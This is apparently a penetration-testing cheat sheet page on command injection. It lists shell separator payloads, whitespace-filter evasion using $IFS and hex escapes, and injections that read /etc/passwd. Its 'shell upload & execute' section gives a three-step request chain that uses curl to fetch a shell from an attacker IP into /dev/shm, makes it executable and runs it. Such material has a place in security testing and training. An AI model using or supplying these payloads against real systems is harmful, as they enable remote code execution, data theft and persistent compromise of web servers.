command injection

some basic payloads

&
&&
|
||
;
;;

ADVANCE TECHNIQUES & PAYLOADS

$(command here)
$(/bin/bash)

google.com&&CMD=$'\x20/etc/passwd'&&cat$CMD

{cat,file.txt}

try to get ping using command injection >>

attacker : start python server on machine
victim   : http://10.10.16.4/

or
http://10.10.16.4/$(id)

read passwd file >>

http://10.10.16.4/$(tail$IFS'-n2'$IFS/etc/passwd)    >> url encode

try without whitespaces

try with IFS variable

replace this >>        cat file.txt

to this      >>        cat${IFS}file.txt

try with hex value

x20

try to echo a b c  >>
CMD=$'\x20a\x20b\x20c'&&echo$CMD

shell upload & execute

&content=http://10.10.15.13:8081/$(curl$IFS'http://10.10.15.13:8081/shell'$IFS'-o'$IFS'/dev/shm/shell')&submit=Post

&content=http://10.10.15.13:8081/$(chmod$IFS'+x'$IFS'/dev/shm/shell')&submit=Post

&content=http%3a//10.10.15.13%3a8081/$(bash$IFS'/dev/shm/shell')&submit=Post

PreviousLFI X Log Poisoning NextSSTI

Last updated 1 year ago

hashtagsome basic payloads

hashtagADVANCE TECHNIQUES & PAYLOADS

hashtagtry without whitespaces

hashtagshell upload & execute

some basic payloads

ADVANCE TECHNIQUES & PAYLOADS

try without whitespaces

shell upload & execute